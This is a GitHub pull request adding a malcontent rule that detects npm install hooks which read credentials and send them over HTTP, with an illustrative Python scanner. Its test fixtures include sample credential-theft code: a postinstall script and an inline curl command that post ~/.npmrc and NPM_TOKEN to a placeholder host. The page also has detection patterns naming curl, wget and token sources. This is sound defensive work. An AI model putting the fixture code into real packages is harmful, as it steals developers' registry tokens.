
Detect npm credential exfil in install scripts #1501

Merged: egibs merged 4 commits into chainguard-dev:main from Big-Comfy:npm-credential-exfil-rule on May 6, 2026

Conversation

@Big-Comfy (Contributor) commented May 4, 2026

Adds a high-risk npm rule for install-time scripts that touch package-manager credentials and also send data over HTTP.

I added a small fixture/test with a postinstall script that reads .npmrc / token env vars and posts them, plus a release-script fixture that mentions NPM_TOKEN but should stay quiet.

The rule metadata also links Unit 42's Shai-Hulud writeup, since that attack used npm install hooks to harvest and exfiltrate developer credentials.

I also opened chainguard-sandbox/malcontent-samples#52 so this can be covered by the sample-output tests once that sample lands.

Checked:

  • make yara-x-compile
  • local YARA-X scan against the positive and negative fixtures
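
The condition the rule encodes (install-time hook AND credential access AND an outbound-network primitive), as an added Python example that is not malcontent's YARA-X rule and not the PR's fixtures. The pattern lists, package names, hostnames and script contents below are constructed for illustration; a release script that mentions NPM_TOKEN is shown alongside so the negative case is visible too.

```python
"""Install-hook credential-exfil check: flag an npm install-time script that
both touches package-manager credentials and has a way to send data out.
Added example, not malcontent's YARA-X rule; pattern lists and fixtures are
constructed for illustration."""
import json
import re

# npm lifecycle scripts that run automatically on `npm install`. A release
# or test script is not an install hook and is deliberately ignored.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed list of package-manager credential sources.
CREDENTIAL_RE = re.compile(r"\.npmrc|NPM_TOKEN|NODE_AUTH_TOKEN|_authToken")

# Assumed list of outbound-network primitives (Node APIs and shell tools).
NETWORK_RE = re.compile(
    r"\bfetch\s*\(|\bhttps?\.request\s*\(|\baxios\.(?:post|put)\b"
    r"|\bcurl\b|\bwget\b|XMLHttpRequest"
)

# Script file handed to an interpreter on the hook's command line,
# e.g. `node scripts/postinstall.js`.
SCRIPT_REF_RE = re.compile(r"\b(?:node|sh|bash)\s+([\w./-]+)")


def hook_sources(command, files):
    """Text to inspect for one hook: the inline command itself plus the
    contents of any script file it invokes (files is path -> contents)."""
    texts = [command]
    for ref in SCRIPT_REF_RE.findall(command):
        if ref in files:
            texts.append(files[ref])
    return "\n".join(texts)


def scan_package(package_json, files):
    """Return one finding per install hook whose code references credentials
    AND contains a network send primitive. Either signal alone is not enough:
    a build script that reads NPM_TOKEN, or one that only downloads, stays quiet."""
    scripts = json.loads(package_json).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        if hook not in scripts:
            continue
        text = hook_sources(scripts[hook], files)
        creds = sorted({m.group(0) for m in CREDENTIAL_RE.finditer(text)})
        net = sorted({m.group(0) for m in NETWORK_RE.finditer(text)})
        if creds and net:
            findings.append({"hook": hook, "credentials": creds, "network": net})
    return findings


# Constructed positive fixture: postinstall reads ~/.npmrc and NPM_TOKEN and
# POSTs them to a hard-coded host.
EXFIL_PKG = json.dumps({
    "name": "example-exfil", "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/setup.js"},
})
EXFIL_FILES = {
    "scripts/setup.js": """
const fs = require('fs'), os = require('os'), https = require('https');
const npmrc = fs.readFileSync(os.homedir() + '/.npmrc', 'utf8');
const body = JSON.stringify({ npmrc, token: process.env.NPM_TOKEN });
const req = https.request({ hostname: 'example.invalid', method: 'POST', path: '/c' });
req.end(body);
""",
}

# Constructed positive fixture with no script file: the exfil is inline shell.
INLINE_EXFIL_PKG = json.dumps({
    "name": "example-inline", "version": "1.0.0",
    "scripts": {"postinstall": "curl -s -X POST --data-binary @$HOME/.npmrc https://example.invalid/c"},
})

# Constructed negative fixture: a release script mentions NPM_TOKEN, but it is
# not an install hook, and the postinstall hook neither reads credentials nor
# sends anything.
BENIGN_PKG = json.dumps({
    "name": "example-benign", "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/build.js", "release": "node scripts/release.js"},
})
BENIGN_FILES = {
    "scripts/build.js": "require('fs').mkdirSync('dist', { recursive: true });",
    "scripts/release.js": "process.env.NODE_AUTH_TOKEN = process.env.NPM_TOKEN;\n"
                          "require('child_process').execSync('npm publish');",
}

if __name__ == "__main__":
    for label, pkg, files in (("exfil", EXFIL_PKG, EXFIL_FILES),
                              ("inline", INLINE_EXFIL_PKG, {}),
                              ("benign", BENIGN_PKG, BENIGN_FILES)):
        print(label, scan_package(pkg, files))
```

The two-signal AND is what keeps the rule high-signal: a hook that only reads `.npmrc` (common for registry configuration) or only makes HTTP calls (common for binary downloads) is not flagged, while scripts outside the install lifecycle are never examined at all, which is why the release-script fixture stays quiet.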

@Big-Comfy closed this May 4, 2026
@Big-Comfy force-pushed the npm-credential-exfil-rule branch from 7a54f42 to e695690 on May 4, 2026 14:22
@Big-Comfy reopened this May 4, 2026
Big-Comfy added 2 commits May 4, 2026 18:52
@egibs (Member) left a comment

Thanks for the contribution!

@egibs merged commit b4bc5cb into chainguard-dev:main on May 6, 2026 (18 checks passed)
@Big-Comfy deleted the npm-credential-exfil-rule branch May 6, 2026 18:19